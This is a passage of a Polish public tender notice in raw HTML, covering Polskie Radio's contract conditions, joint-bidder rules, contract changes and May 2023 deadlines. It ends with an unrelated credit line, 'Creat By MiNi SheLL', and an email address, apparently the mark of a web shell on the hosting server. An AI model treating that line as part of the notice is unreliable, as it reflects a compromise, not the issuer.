umocowania. Pełnomocnictwo musi być podpisane przez osoby uprawnione do reprezentacji mocodawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Wykazując spełnienie warunków udziału, określonych w Rozdziale IX ust. 1 SWZ, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolności tych z nich, którzy wykonają czynności określone w przedmiocie zamówienia, do których zdolności wskazane w warunku są wymagane. Wykazując spełnienie warunku udziału, określonego w Rozdziale IX ust. 1 pkt 1) nie dopuszcza się by Wykonawca wykazywał doświadczenie grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał danego zakresu czynności. <br/>3.	W celu wykazania braku podstaw do wykluczenia, wskazanych w Rozdziale VIII ust. 1 SWZ, oraz wykazania spełnienia warunków udziału określonych w Rozdziale IX ust. 1 wraz z oferta, każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z Rozdziałem X ust. 1 pkt 1) SWZ, załącza do oferty wspólnej oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału, sporządzone zgodnie ze wzorem stanowiącym Złącznik nr 3 do SWZ i wytycznymi zawartymi w Rozdziale X ust.1 pkt 1) oraz złożone zgodnie z wytycznymi zawartymi w Załączniku nr 9 do SWZ. Oświadczenie potwierdza spełnienie przez wykonawcę wspólnie ubiegającego się o udzielenie zmówienia warunku udziału, w zakresie, w jakim każdy z wykonawców wspólnie ubiegających się udzielenie zamówienia wykazuje spełnienie warunków udziału, określonych w Rozdziale IX ust. 1 SWZ. <br/>4.	W przypadku, gdy wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w celu wykazania spełnienia warunków określonych w Rozdziale IX ust. 1 SWZ, polegają na potencjale podmiotu udostępniającego zasoby (sytuacja określona w Rozdziale IX ust. 2 SWZ) wraz z ofertą zobowiązani są złożyć oświadczenie oraz zobowiązanie podmiotu udostępniającego zasoby, wskazane w Rozdziale X ust. 1 pkt 2 SWZ. <br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, z którego będzie wynikać, które elementy przedmiotu zamówienia będą wykonywać poszczególni wykonawcy. <br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają również dokumenty wymienione w Rozdziale X ust. 2 SWZ – w zakresie i sytuacjach tam określonych. <br/>7.	W przypadku, gdy najwyżej ocenioną będzie oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed wyborem tej oferty Zamawiający w terminie wskazanym w pkt Rozdziale X ust. 3 SWZ, wezwie wykonawców do: <br/>1)	złożenia przez każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>a)	informacji wskazanej w Rozdziale X ust. 3 pkt 2) lit. a) SWZ; <br/>b)	zaświadczeń wskazanych w Rozdziale X ust. 3 pkt 2) lit. b) – c) SWZ; <br/>c)	oświadczeń wskazanych w Rozdziale X ust. 3 pkt 2) lit. d) – f) SWZ; <br/>2)	złożenia wykazów oraz dokumentów lub oświadczeń wskazanych w Rozdziale X ust. 3 pkt 1) SWZ<br/>8.	Do wykonawców wspólnie ubiegających się o udzielenie zamówienia zastosowanie mają odpowiednie przepisy ustawy Pzp oraz postanowienia SWZ dotyczące wykonawców. <br/>9.	Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość dokonania zmian Umowy, stanowiącej załącznik nr 8 do SWZ w stosunku do treści oferty w następujących przypadkach i zakresie:<br/>1)	w przypadku wystąpienia okoliczności Siły Wyższej, o której mowa w § 11, pod warunkami określonymi w tym paragrafie, poprzez dostosowania warunków realizacji Umowy do warunków będących następstwem okoliczności Siły Wyższej i w zakresie niezbędnym do zakończenia realizacji Umowy; <br/>2)	w zakresie dotyczącym ochrony danych osobowych – w przypadku zmiany stanu prawnego dotyczącego ochrony danych osobowych lub przetwarzania tych danych, w zakresie, w jakim zmiany te wpływać będą na treść klauzul zawartych w Umowie, w celu zapewnienia jej zgodności z przepisami prawa; <br/>3)	w zakresie podwykonawstwa, gdy Wykonawca, składając ofertę, zobowiązał się do samodzielnego wykonania przedmiotu Umowy, o którym mowa w § 1, a w okresie realizacji, zaistnieje konieczność wykonania przedmiotu Umowy z udziałem podwykonawcy – w tym przypadku Wykonawca niezwłocznie, nie później jednak niż na 14 dni kalendarzowych przed przystąpieniem do realizacji Umowy z udziałem podwykonawców, zobowiązany jest do: <br/>a)	wykazania powodów, dla których realizacja przedmiotu Umowy wymaga udziału podwykonawcy, <br/>b)	wskazania zakresu czynności/prac, które zostaną przekazane podwykonawcy do wykonania, <br/>c)	podania nazwy (firmy) podwykonawcy, jego danych kontaktowych oraz osób do kontaktu z nim; <br/>4)	w zakresie podwykonawstwa, w przypadku zmiany podwykonawców wymienionych w § 9 ust 3 Umowy, pod warunkiem wskazania nie później niż na 14 dni kalendarzowych przed planowaną zmianą, powodu, dla którego konieczna jest przedmiotowa zmiana i nazwy (firmy) podwykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez elektroniczną Platformę Przetargową Polskiego Radia S.A. dostępną pod adresem: https://polskieradio.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-09 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga, aby przedmiot zamówienia był zrealizowany przez okres 12 miesięcy, począwszy od dnia 16 czerwca 2023 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com